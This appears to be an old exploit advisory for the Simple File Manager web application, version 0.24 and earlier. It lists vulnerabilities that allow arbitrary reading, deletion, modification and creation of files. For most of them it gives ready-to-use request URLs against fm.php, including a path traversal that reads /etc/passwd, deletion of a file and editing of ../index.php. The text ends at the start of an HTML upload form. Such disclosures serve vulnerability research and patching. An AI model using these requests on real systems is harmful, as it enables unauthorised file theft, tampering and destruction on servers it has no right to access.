/*******************************************\ | flame vrs Simple File Manager <=0.24=> | | http://onedotoh.sourceforge.net/ | | Various Vulnerbilities Including: | \*******************************************/ /+++++++++++++++++++++++++++++++++++++++++++\ | Using the scripts supplied by the webapp: | | Reading of Arbitrary files | | Deletion of Arbitrary files | | Modification of Arbitrary files | | Creation of Arbitrary files | | Uploading of Malicious files | \+++++++++++++++++++++++++++++++++++++++++++/ /&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\ | Simple File Manager (SFM) is a web based | | file management utility. | | It is designed to be used by those that | | don't want to use ftp or SHOULD NOT use | | ftp. It can be dropped into a specific | | directory and give access to that | | directory as well as any directory below | | it, including those created by SFM. It | | can be placed in a specific directory and | | configured to give access to other | | directories outside of its location | | (centralized). SFM gives its user upload, | | rename, delete, directory creation as | | well as directory navigation (within its | | tree limits), as well as Create New File; | | it also includes an image viewer, text | | viewer and mime type downloading. | \&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/ | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ | | Thats the description from the author...| | Which basically outlines all of its | | vulnerbilities. | \_________________________________________/ /=========================================================================================================================\ ############################ .:Reading of Arbitrary Files:. ############################################################### # fm.php?action=download&filename=[RELATIVE PATH / FILENAME]&pathext=&u=&&copt=1&sortKey=2 # # EG: http://www.site.com/file/fm.php?action=download&filename=../../../../../../etc/passwd&pathext=&u=&&copt=1&sortKey=2 # ########################################################################################################################### \=========================================================================================================================/ /=========================================================================================================================\ ############################ .:Deletion of Arbirary Files:. ############################################################### # fm.php?delete=[RELATIVE PATH / FILENAME]&copt=1&sortKey=2&u=&pathext= # # EG: http://www.site.com/file/fm.php?delete=phpshell.php&copt=1&sortKey=2&u=&pathext= # ########################################################################################################################### \=========================================================================================================================/ /=========================================================================================================================\ ############################# .:Modification of Arbitrary Files:. ######################################################### # fm.php?edit=[RELATEIVE PATH / FILENAME]&u=&copt=1&pathext= # # EG: http://www.site.com/file/fm.php?edit=../index.php&u=&copt=1&pathext= # ########################################################################################################################### \=========================================================================================================================/ /=========================================================================================================================\ ############################# .:Creation of Arbitrary Files:. ############################################################# # START LOCAL HTML FILE: #
Filename: